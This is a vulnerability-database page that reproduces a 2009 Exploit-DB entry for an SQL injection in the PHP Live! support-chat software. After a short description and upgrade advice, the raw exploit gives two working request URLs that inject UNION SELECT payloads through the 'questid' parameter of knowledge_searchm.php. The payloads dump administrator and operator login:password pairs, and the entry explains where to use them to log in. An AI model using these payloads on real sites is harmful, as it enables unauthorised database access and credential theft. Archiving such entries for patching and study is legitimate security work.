header-logo
Suggest Exploit
vendor:
PHP Live!
by:
skys
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PHP Live!
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

PHP Live! SQL Injection Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'questid' parameter of 'knowledge_searchm.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database. Successful exploitation of this vulnerability may allow an attacker to gain access to sensitive information, such as passwords, stored in the database.

Mitigation:

The vendor has released an update to address this vulnerability. It is recommended to upgrade to the latest version of the application.
Source

Exploit-DB raw data:

Original author: Found by Xar of h4ck-y0u, Greets to Don & ViSiOn
Modified version: skys
Contact: skysbsb[at]gmail.com


[!]Info[!]

PHP Live! (© OSI Codes Inc.) enables live help and live customer support
communication directly from your website. With PHP Live!, you can
provide one-on-one chat assistance in real-time, answer visitor
questions and add that extra human touch to your website.

[!]SQL Injection[!]
The original code was a little mistake, the right code:

Code:
Set the proper l(login) var in the parameter request.
In this example, l=admin

http://www.site.com/path-to-phplive/admin/traffic/knowledge_searchm.php?action=expand_question&l=admin&x=1&questid=-1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,concat%28login,char%2858%29,password%29/**/from/**/chat_asp%20limit%200,1

In the Answer field, you will see the login:password for the
http://www.site.com/path-to-phplive/setup/login.php

or, if you want to mess only just with the operators,

http://www.site.com/path-to-phplive/admin/traffic/knowledge_searchm.php?action=expand_question&l=admin&x=1&questid=-1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,concat%28login,char%2858%29,password%29/**/from/**/chat_admin%20limit%200,1

# milw0rm.com [2009-07-24]

Navigation

Suggest Exploit

Services By CQR